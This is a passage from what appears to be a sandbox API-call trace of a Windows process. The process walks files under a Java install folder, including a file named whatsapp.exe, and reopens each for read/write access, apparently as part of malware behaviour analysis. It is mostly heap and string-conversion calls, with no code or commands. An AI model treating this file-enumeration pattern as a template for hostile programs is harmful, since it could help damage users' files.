dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0098.073] AreFileApisANSI () returned 1 [0098.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e1c8 [0098.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 63 [0098.073] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2371c)) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0098.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.073] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Welcome.html", cAlternateFileName="WELCOM~1.HTM")) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69e30 [0098.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0098.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0098.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0098.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.074] AreFileApisANSI () returned 1 [0098.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html", lpUsedDefaultChar=0x0) returned 48 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.074] AreFileApisANSI () returned 1 [0098.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0098.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0098.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 48 [0098.074] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.075] GetFileType (hFile=0x27c) returned 0x1 [0098.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.075] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.075] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.075] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.075] CloseHandle (hObject=0x27c) returned 1 [0098.075] AreFileApisANSI () returned 1 [0098.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0098.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0098.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 48 [0098.076] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.076] GetFileType (hFile=0x27c) returned 0x1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0098.076] CloseHandle (hObject=0x27c) returned 1 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.077] AreFileApisANSI () returned 1 [0098.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0098.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html") returned 48 [0098.077] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bb)) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.077] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.077] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46bb0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="co", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓λ")) returned 0 [0098.077] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0098.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0098.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.078] AreFileApisANSI () returned 1 [0098.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\whatsapp.exe", lpUsedDefaultChar=0x0) returned 35 [0098.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.079] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.079] AreFileApisANSI () returned 1 [0098.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0098.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0098.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Java\\whatsapp.exe") returned 35 [0098.079] CreateFileW (lpFileName="C:\\Program Files\\Java\\whatsapp.exe" (normalized: "c:\\program files\\java\\whatsapp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.079] GetFileType (hFile=0x420) returned 0x1 [0098.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0098.079] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.079] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.080] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.080] CloseHandle (hObject=0x420) returned 1 [0098.080] AreFileApisANSI () returned 1 [0098.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0098.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0098.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x68ea0, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Java\\whatsapp.exe") returned 35 [0098.080] CreateFileW (lpFileName="C:\\Program Files\\Java\\whatsapp.exe" (normalized: "c:\\program files\\java\\whatsapp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.080] GetLastError () returned 0x20 [0098.080] GetLastError () returned 0x20 [0098.080] SetLastError (dwErrCode=0x20) [0098.080] GetLastError () returned 0x20 [0098.080] SetLastError (dwErrCode=0x20) [0098.080] GetLastError () returned 0x20 [0098.080] SetLastError (dwErrCode=0x20) [0098.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.081] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x44, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6d428, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x44, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㈀\x01⺊Ā")) returned 0 [0098.081] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0098.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0098.081] 